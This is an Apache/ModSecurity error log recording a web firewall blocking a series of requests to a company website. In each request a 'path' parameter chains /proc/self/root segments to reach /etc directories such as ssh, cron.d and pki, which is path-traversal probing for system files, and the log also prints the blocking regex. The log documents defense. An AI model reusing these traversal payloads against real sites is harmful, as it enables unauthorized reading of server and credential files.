[Thu Mar 19 03:52:30.028580 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:51272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudLl_V7PWP6ixUYl6CQgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:32.439021 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:51282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudMAbLMZ6AikZjR9UjpwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:33.553524 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:39590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudMV_V7PWP6ixUYl6CRgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:52:40.024836 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:51288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudOPu8EFLIOrSqIptkQAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:42.718329 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:55448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudOgbLMZ6AikZjR9UjrwAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:56.737676 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:55464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudSBkFeYa1D6dYQnCzaAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:59.088277 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:33972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudSwbLMZ6AikZjR9UjtAAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:01.441488 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:33988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudTQbLMZ6AikZjR9UjuQAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:02.758955 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:33998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudTgbLMZ6AikZjR9UjvAAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:04.064762 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.241.31:34012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudUAbLMZ6AikZjR9UjvwAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:05.355857 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:34022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudUf-YZRR_7pZ7nDJUFAAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:06.671258 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.241.31:34030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudUv-YZRR_7pZ7nDJUFQAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:13.531252 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:57948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudWeyqAr6etmhZHNoquQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:16.149981 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:57964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudXP-YZRR_7pZ7nDJUHAAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:19.203557 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:47776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudX_u8EFLIOrSqIptkTwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:23.916421 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:47790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudYwbLMZ6AikZjR9Uj2QAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:26.336735 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:47800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudZuyqAr6etmhZHNoqvAAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:53:28.125355 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:59046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudaOoXxyEfFpUF8f_YBQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:53:32.676477 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:35874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudbNa6ubjKNq_cu4YFiwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:53:42.153660 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:35378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuddgbLMZ6AikZjR9Uj6QAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:53:42.228682 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:55842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuddta6ubjKNq_cu4YFmgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
